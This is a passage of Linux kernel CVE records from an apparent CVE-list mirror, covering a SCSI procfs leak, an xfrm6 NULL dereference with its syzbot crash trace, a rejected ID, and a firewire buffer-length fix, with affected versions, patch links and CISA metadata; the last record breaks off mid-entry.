          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: core: Fix unremoved procfs host directory regression\n\nCommit fc663711b944 (\"scsi: core: Remove the /proc/scsi/${proc_name}\ndirectory earlier\") fixed a bug related to modules loading/unloading, by\nadding a call to scsi_proc_hostdir_rm() on scsi_remove_host(). But that led\nto a potential duplicate call to the hostdir_rm() routine, since it\u0027s also\ncalled from scsi_host_dev_release(). That triggered a regression report,\nwhich was then fixed by commit be03df3d4bfe (\"scsi: core: Fix a procfs host\ndirectory removal regression\"). The fix just dropped the hostdir_rm() call\nfrom dev_release().\n\nBut it happens that this proc directory is created on scsi_host_alloc(),\nand that function \"pairs\" with scsi_host_dev_release(), while\nscsi_remove_host() pairs with scsi_add_host(). In other words, it seems the\nreason for removing the proc directory on dev_release() was meant to cover\ncases in which a SCSI host structure was allocated, but the call to\nscsi_add_host() didn\u0027t happen. And that pattern happens to exist in some\nerror paths, for example.\n\nSyzkaller causes that by using USB raw gadget device, error\u0027ing on\nusb-storage driver, at usb_stor_probe2(). By checking that path, we can see\nthat the BadDevice label leads to a scsi_host_put() after a SCSI host\nallocation, but there\u0027s no call to scsi_add_host() in such path. That leads\nto messages like this in dmesg (and a leak of the SCSI host proc\nstructure):\n\nusb-storage 4-1:87.51: USB Mass Storage device detected\nproc_dir_entry \u0027scsi/usb-storage\u0027 already registered\nWARNING: CPU: 1 PID: 3519 at fs/proc/generic.c:377 proc_register+0x347/0x4e0 fs/proc/generic.c:376\n\nThe proper fix seems to still call scsi_proc_hostdir_rm() on dev_release(),\nbut guard that with the state check for SHOST_CREATED; there is even a\ncomment in scsi_host_dev_release() detailing that: such conditional is\nmeant for cases where the SCSI host was allocated but there was no calls to\n{add,remove}_host(), like the usb-storage case.\n\nThis is what we propose here and with that, the error path of usb-storage\ndoes not trigger the warning anymore."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:55:14.484Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/0053f15d50d50c9312d8ab9c11e2e405812dfcac"
        },
        {
          "url": "https://git.kernel.org/stable/c/5c2386ba80e779a92ec3bb64ccadbedd88f779b1"
        },
        {
          "url": "https://git.kernel.org/stable/c/cea234bb214b17d004dfdccce4491e6ff57c96ee"
        },
        {
          "url": "https://git.kernel.org/stable/c/3678cf67ff7136db1dd3bf63c361650db5d92889"
        },
        {
          "url": "https://git.kernel.org/stable/c/d4c34782b6d7b1e68d18d9549451b19433bd4c6c"
        },
        {
          "url": "https://git.kernel.org/stable/c/e293c773c13b830cdc251f155df2254981abc320"
        },
        {
          "url": "https://git.kernel.org/stable/c/f4ff08fab66eb5c0b97e1a24edac052fb40bf5d7"
        },
        {
          "url": "https://git.kernel.org/stable/c/f23a4d6e07570826fe95023ca1aa96a011fa9f84"
        }
      ],
      "title": "scsi: core: Fix unremoved procfs host directory regression",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26935",
    "datePublished": "2024-05-01T05:17:31.445Z",
    "dateReserved": "2024-02-19T14:20:24.196Z",
    "dateUpdated": "2025-05-04T12:55:14.484Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-40959 (GCVE-0-2024-40959)

Vulnerability from cvelistv5 – Published: 2024-07-12 12:32 – Updated: 2025-11-03 21:58

Title

xfrm6: check ip6_dst_idev() return value in xfrm6_get_saddr()

Summary

In the Linux kernel, the following vulnerability has been resolved: xfrm6: check ip6_dst_idev() return value in xfrm6_get_saddr() ip6_dst_idev() can return NULL, xfrm6_get_saddr() must act accordingly. syzbot reported: Oops: general protection fault, probably for non-canonical address 0xdffffc0000000000: 0000 [#1] PREEMPT SMP KASAN PTI KASAN: null-ptr-deref in range [0x0000000000000000-0x0000000000000007] CPU: 1 PID: 12 Comm: kworker/u8:1 Not tainted 6.10.0-rc2-syzkaller-00383-gb8481381d4e2 #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 04/02/2024 Workqueue: wg-kex-wg1 wg_packet_handshake_send_worker RIP: 0010:xfrm6_get_saddr+0x93/0x130 net/ipv6/xfrm6_policy.c:64 Code: df 48 89 fa 48 c1 ea 03 80 3c 02 00 0f 85 97 00 00 00 4c 8b ab d8 00 00 00 48 b8 00 00 00 00 00 fc ff df 4c 89 ea 48 c1 ea 03 <80> 3c 02 00 0f 85 86 00 00 00 4d 8b 6d 00 e8 ca 13 47 01 48 b8 00 RSP: 0018:ffffc90000117378 EFLAGS: 00010246 RAX: dffffc0000000000 RBX: ffff88807b079dc0 RCX: ffffffff89a0d6d7 RDX: 0000000000000000 RSI: ffffffff89a0d6e9 RDI: ffff88807b079e98 RBP: ffff88807ad73248 R08: 0000000000000007 R09: fffffffffffff000 R10: ffff88807b079dc0 R11: 0000000000000007 R12: ffffc90000117480 R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000 FS: 0000000000000000(0000) GS:ffff8880b9300000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007f4586d00440 CR3: 0000000079042000 CR4: 00000000003506f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: <TASK> xfrm_get_saddr net/xfrm/xfrm_policy.c:2452 [inline] xfrm_tmpl_resolve_one net/xfrm/xfrm_policy.c:2481 [inline] xfrm_tmpl_resolve+0xa26/0xf10 net/xfrm/xfrm_policy.c:2541 xfrm_resolve_and_create_bundle+0x140/0x2570 net/xfrm/xfrm_policy.c:2835 xfrm_bundle_lookup net/xfrm/xfrm_policy.c:3070 [inline] xfrm_lookup_with_ifid+0x4d1/0x1e60 net/xfrm/xfrm_policy.c:3201 xfrm_lookup net/xfrm/xfrm_policy.c:3298 [inline] xfrm_lookup_route+0x3b/0x200 net/xfrm/xfrm_policy.c:3309 ip6_dst_lookup_flow+0x15c/0x1d0 net/ipv6/ip6_output.c:1256 send6+0x611/0xd20 drivers/net/wireguard/socket.c:139 wg_socket_send_skb_to_peer+0xf9/0x220 drivers/net/wireguard/socket.c:178 wg_socket_send_buffer_to_peer+0x12b/0x190 drivers/net/wireguard/socket.c:200 wg_packet_send_handshake_initiation+0x227/0x360 drivers/net/wireguard/send.c:40 wg_packet_handshake_send_worker+0x1c/0x30 drivers/net/wireguard/send.c:51 process_one_work+0x9fb/0x1b60 kernel/workqueue.c:3231 process_scheduled_works kernel/workqueue.c:3312 [inline] worker_thread+0x6c8/0xf70 kernel/workqueue.c:3393 kthread+0x2c1/0x3a0 kernel/kthread.c:389 ret_from_fork+0x45/0x80 arch/x86/kernel/process.c:147 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:244

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/c71761292d4d002a8…
	https://git.kernel.org/stable/c/caf0bec84c62fb1cf…
	https://git.kernel.org/stable/c/20427b85781aca0ad…
	https://git.kernel.org/stable/c/9f30f1f1a51d91e19…
	https://git.kernel.org/stable/c/83c02fb2cc0afee5b…
	https://git.kernel.org/stable/c/f897d7171652fcfc7…
	https://git.kernel.org/stable/c/600a62b4232ac027f…
	https://git.kernel.org/stable/c/d46401052c2d5614d…

Impacted products

Vendor

Product

Version

Linux

Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < c71761292d4d002a8eccb57b86792c4e3b3eb3c7 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < caf0bec84c62fb1cf6f7c9f0e8c857c87f8adbc3 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 20427b85781aca0ad072851f6907a3d4b2fed8d1 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 9f30f1f1a51d91e19f5a09236bb0b59e6a07ad08 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 83c02fb2cc0afee5bb53cddf3f34f045f654ad6a (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < f897d7171652fcfc76d042bfec798b010ee89e41 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 600a62b4232ac027f788c3ca395bc2333adeaacf (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < d46401052c2d5614da8efea5788532f0401cb164 (git)

Linux

Affected: 2.6.12
Unaffected: 0 , < 2.6.12 (semver)
Unaffected: 4.19.317 , ≤ 4.19.* (semver)
Unaffected: 5.4.279 , ≤ 5.4.* (semver)
Unaffected: 5.10.221 , ≤ 5.10.* (semver)
Unaffected: 5.15.162 , ≤ 5.15.* (semver)
Unaffected: 6.1.96 , ≤ 6.1.* (semver)
Unaffected: 6.6.36 , ≤ 6.6.* (semver)
Unaffected: 6.9.7 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T21:58:24.440Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c71761292d4d002a8eccb57b86792c4e3b3eb3c7"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/caf0bec84c62fb1cf6f7c9f0e8c857c87f8adbc3"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/20427b85781aca0ad072851f6907a3d4b2fed8d1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9f30f1f1a51d91e19f5a09236bb0b59e6a07ad08"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/83c02fb2cc0afee5bb53cddf3f34f045f654ad6a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f897d7171652fcfc76d042bfec798b010ee89e41"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/600a62b4232ac027f788c3ca395bc2333adeaacf"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d46401052c2d5614da8efea5788532f0401cb164"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-40959",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:03:32.493847Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:23.806Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/ipv6/xfrm6_policy.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "c71761292d4d002a8eccb57b86792c4e3b3eb3c7",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "caf0bec84c62fb1cf6f7c9f0e8c857c87f8adbc3",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "20427b85781aca0ad072851f6907a3d4b2fed8d1",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "9f30f1f1a51d91e19f5a09236bb0b59e6a07ad08",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "83c02fb2cc0afee5bb53cddf3f34f045f654ad6a",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "f897d7171652fcfc76d042bfec798b010ee89e41",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "600a62b4232ac027f788c3ca395bc2333adeaacf",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "d46401052c2d5614da8efea5788532f0401cb164",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/ipv6/xfrm6_policy.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.12"
            },
            {
              "lessThan": "2.6.12",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.317",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.279",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.221",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.162",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.96",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.36",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.7",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.317",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.279",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.221",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.162",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.96",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.36",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.7",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nxfrm6: check ip6_dst_idev() return value in xfrm6_get_saddr()\n\nip6_dst_idev() can return NULL, xfrm6_get_saddr() must act accordingly.\n\nsyzbot reported:\n\nOops: general protection fault, probably for non-canonical address 0xdffffc0000000000: 0000 [#1] PREEMPT SMP KASAN PTI\nKASAN: null-ptr-deref in range [0x0000000000000000-0x0000000000000007]\nCPU: 1 PID: 12 Comm: kworker/u8:1 Not tainted 6.10.0-rc2-syzkaller-00383-gb8481381d4e2 #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 04/02/2024\nWorkqueue: wg-kex-wg1 wg_packet_handshake_send_worker\n RIP: 0010:xfrm6_get_saddr+0x93/0x130 net/ipv6/xfrm6_policy.c:64\nCode: df 48 89 fa 48 c1 ea 03 80 3c 02 00 0f 85 97 00 00 00 4c 8b ab d8 00 00 00 48 b8 00 00 00 00 00 fc ff df 4c 89 ea 48 c1 ea 03 \u003c80\u003e 3c 02 00 0f 85 86 00 00 00 4d 8b 6d 00 e8 ca 13 47 01 48 b8 00\nRSP: 0018:ffffc90000117378 EFLAGS: 00010246\nRAX: dffffc0000000000 RBX: ffff88807b079dc0 RCX: ffffffff89a0d6d7\nRDX: 0000000000000000 RSI: ffffffff89a0d6e9 RDI: ffff88807b079e98\nRBP: ffff88807ad73248 R08: 0000000000000007 R09: fffffffffffff000\nR10: ffff88807b079dc0 R11: 0000000000000007 R12: ffffc90000117480\nR13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000\nFS:  0000000000000000(0000) GS:ffff8880b9300000(0000) knlGS:0000000000000000\nCS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00007f4586d00440 CR3: 0000000079042000 CR4: 00000000003506f0\nDR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\nDR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\nCall Trace:\n \u003cTASK\u003e\n  xfrm_get_saddr net/xfrm/xfrm_policy.c:2452 [inline]\n  xfrm_tmpl_resolve_one net/xfrm/xfrm_policy.c:2481 [inline]\n  xfrm_tmpl_resolve+0xa26/0xf10 net/xfrm/xfrm_policy.c:2541\n  xfrm_resolve_and_create_bundle+0x140/0x2570 net/xfrm/xfrm_policy.c:2835\n  xfrm_bundle_lookup net/xfrm/xfrm_policy.c:3070 [inline]\n  xfrm_lookup_with_ifid+0x4d1/0x1e60 net/xfrm/xfrm_policy.c:3201\n  xfrm_lookup net/xfrm/xfrm_policy.c:3298 [inline]\n  xfrm_lookup_route+0x3b/0x200 net/xfrm/xfrm_policy.c:3309\n  ip6_dst_lookup_flow+0x15c/0x1d0 net/ipv6/ip6_output.c:1256\n  send6+0x611/0xd20 drivers/net/wireguard/socket.c:139\n  wg_socket_send_skb_to_peer+0xf9/0x220 drivers/net/wireguard/socket.c:178\n  wg_socket_send_buffer_to_peer+0x12b/0x190 drivers/net/wireguard/socket.c:200\n  wg_packet_send_handshake_initiation+0x227/0x360 drivers/net/wireguard/send.c:40\n  wg_packet_handshake_send_worker+0x1c/0x30 drivers/net/wireguard/send.c:51\n  process_one_work+0x9fb/0x1b60 kernel/workqueue.c:3231\n  process_scheduled_works kernel/workqueue.c:3312 [inline]\n  worker_thread+0x6c8/0xf70 kernel/workqueue.c:3393\n  kthread+0x2c1/0x3a0 kernel/kthread.c:389\n  ret_from_fork+0x45/0x80 arch/x86/kernel/process.c:147\n  ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:244"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:18:49.327Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/c71761292d4d002a8eccb57b86792c4e3b3eb3c7"
        },
        {
          "url": "https://git.kernel.org/stable/c/caf0bec84c62fb1cf6f7c9f0e8c857c87f8adbc3"
        },
        {
          "url": "https://git.kernel.org/stable/c/20427b85781aca0ad072851f6907a3d4b2fed8d1"
        },
        {
          "url": "https://git.kernel.org/stable/c/9f30f1f1a51d91e19f5a09236bb0b59e6a07ad08"
        },
        {
          "url": "https://git.kernel.org/stable/c/83c02fb2cc0afee5bb53cddf3f34f045f654ad6a"
        },
        {
          "url": "https://git.kernel.org/stable/c/f897d7171652fcfc76d042bfec798b010ee89e41"
        },
        {
          "url": "https://git.kernel.org/stable/c/600a62b4232ac027f788c3ca395bc2333adeaacf"
        },
        {
          "url": "https://git.kernel.org/stable/c/d46401052c2d5614da8efea5788532f0401cb164"
        }
      ],
      "title": "xfrm6: check ip6_dst_idev() return value in xfrm6_get_saddr()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-40959",
    "datePublished": "2024-07-12T12:32:01.149Z",
    "dateReserved": "2024-07-12T12:17:45.593Z",
    "dateUpdated": "2025-11-03T21:58:24.440Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-40982 (GCVE-0-2024-40982)

Vulnerability from cvelistv5 – Published: 2024-07-12 12:32 – Updated: 2025-02-24 12:54

This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "cna": {
      "providerMetadata": {
        "dateUpdated": "2025-02-24T12:54:47.105Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "rejectedReasons": [
        {
          "lang": "en",
          "value": "This CVE ID has been rejected or withdrawn by its CVE Numbering Authority."
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-40982",
    "datePublished": "2024-07-12T12:32:16.938Z",
    "dateRejected": "2025-02-24T12:54:47.105Z",
    "dateReserved": "2024-07-12T12:17:45.604Z",
    "dateUpdated": "2025-02-24T12:54:47.105Z",
    "state": "REJECTED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-27401 (GCVE-0-2024-27401)

Vulnerability from cvelistv5 – Published: 2024-05-13 10:29 – Updated: 2026-01-05 10:35

Title

firewire: nosy: ensure user_length is taken into account when fetching packet contents

Summary

In the Linux kernel, the following vulnerability has been resolved: firewire: nosy: ensure user_length is taken into account when fetching packet contents Ensure that packet_buffer_get respects the user_length provided. If the length of the head packet exceeds the user_length, packet_buffer_get will now return 0 to signify to the user that no data were read and a larger buffer size is required. Helps prevent user space overflows.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/67f34f093c0f7bf33…
	https://git.kernel.org/stable/c/7b8c7bd2296e95b38…
	https://git.kernel.org/stable/c/cca330c59c5420756…
	https://git.kernel.org/stable/c/79f988d3ffc1aa778…
	https://git.kernel.org/stable/c/4ee0941da10e8fdcd…
	https://git.kernel.org/stable/c/1fe60ee709436550f…
	https://git.kernel.org/stable/c/539d51ac48bcfcfa1…
	https://git.kernel.org/stable/c/38762a0763c10c24a…

Impacted products

Vendor

Product

Version

Linux

Affected: 286468210d83ce0ca1e37e346ed9f4457a161650 , < 67f34f093c0f7bf33f5b4ae64d3d695a3b978285 (git)
Affected: 286468210d83ce0ca1e37e346ed9f4457a161650 , < 7b8c7bd2296e95b38a6ff346242356a2e7190239 (git)
Affected: 286468210d83ce0ca1e37e346ed9f4457a161650 , < cca330c59c54207567a648357835f59df9a286bb (git)
Affected: 286468210d83ce0ca1e37e346ed9f4457a161650 , < 79f988d3ffc1aa778fc5181bdfab312e57956c6b (git)
Affected: 286468210d83ce0ca1e37e346ed9f4457a161650 , < 4ee0941da10e8fdcdb34756b877efd3282594c1f (git)
Affected: 286468210d83ce0ca1e37e346ed9f4457a161650 , < 1fe60ee709436550f8cfbab01295936b868d5baa (git)
Affected: 286468210d83ce0ca1e37e346ed9f4457a161650 , < 539d51ac48bcfcfa1b3d4a85f8df92fa22c1d41c (git)
Affected: 286468210d83ce0ca1e37e346ed9f4457a161650 , < 38762a0763c10c24a4915feee722d7aa6e73eb98 (git)

Linux

Affected: 2.6.36
Unaffected: 0 , < 2.6.36 (semver)
Unaffected: 4.19.314 , ≤ 4.19.* (semver)
Unaffected: 5.4.276 , ≤ 5.4.* (semver)
Unaffected: 5.10.217 , ≤ 5.10.* (semver)
Unaffected: 5.15.159 , ≤ 5.15.* (semver)
Unaffected: 6.1.91 , ≤ 6.1.* (semver)
Unaffected: 6.6.31 , ≤ 6.6.* (semver)
Unaffected: 6.8.10 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-27401",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-13T17:55:43.034157Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-07-05T17:21:00.939Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:34:52.126Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/67f34f093c0f7bf33f5b4ae64d3d695a3b978285"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7b8c7bd2296e95b38a6ff346242356a2e7190239"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/cca330c59c54207567a648357835f59df9a286bb"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/79f988d3ffc1aa778fc5181bdfab312e57956c6b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4ee0941da10e8fdcdb34756b877efd3282594c1f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1fe60ee709436550f8cfbab01295936b868d5baa"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/539d51ac48bcfcfa1b3d4a85f8df92fa22c1d41c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/38762a0763c10c24a4915feee722d7aa6e73eb98"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OTB4HWU2PTVW5NEYHHLOCXDKG3PYA534/"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DW2MIOIMOFUSNLHLRYX23AFR36BMKD65/"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00019.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/firewire/nosy.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "67f34f093c0f7bf33f5b4ae64d3d695a3b978285",
              "status": "affected",
              "version": "286468210d83ce0ca1e37e346ed9f4457a161650",
              "versionType": "git"
            },
            {
              "lessThan": "7b8c7bd2296e95b38a6ff346242356a2e7190239",
              "status": "affected",
              "version": "286468210d83ce0ca1e37e346ed9f4457a161650",
              "versionType": "git"
            },
            {
              "lessThan": "cca330c59c54207567a648357835f59df9a286bb",
              "status": "affected",
              "version": "286468210d83ce0ca1e37e346ed9f4457a161650",
              "versionType": "git"
            },
            {
              "lessThan": "79f988d3ffc1aa778fc5181bdfab312e57956c6b",
              "status": "affected",
              "version": "286468210d83ce0ca1e37e346ed9f4457a161650",
              "versionType": "git"
            },
            {
              "lessThan": "4ee0941da10e8fdcdb34756b877efd3282594c1f",
              "status": "affected",
              "version": "286468210d83ce0ca1e37e346ed9f4457a161650",
              "versionType": "git"
            },
            {
              "lessThan": "1fe60ee709436550f8cfbab01295936b868d5baa",
              "status": "affected",
              "version": "286468210d83ce0ca1e37e346ed9f4457a161650",
              "versionType": "git"
            },
            {
              "lessThan": "539d51ac48bcfcfa1b3d4a85f8df92fa22c1d41c",
              "status": "affected",
              "version": "286468210d83ce0ca1e37e346ed9f4457a161650",
              "versionType": "git"
            },
            {
              "lessThan": "38762a0763c10c24a4915feee722d7aa6e73eb98",
              "status": "affected",
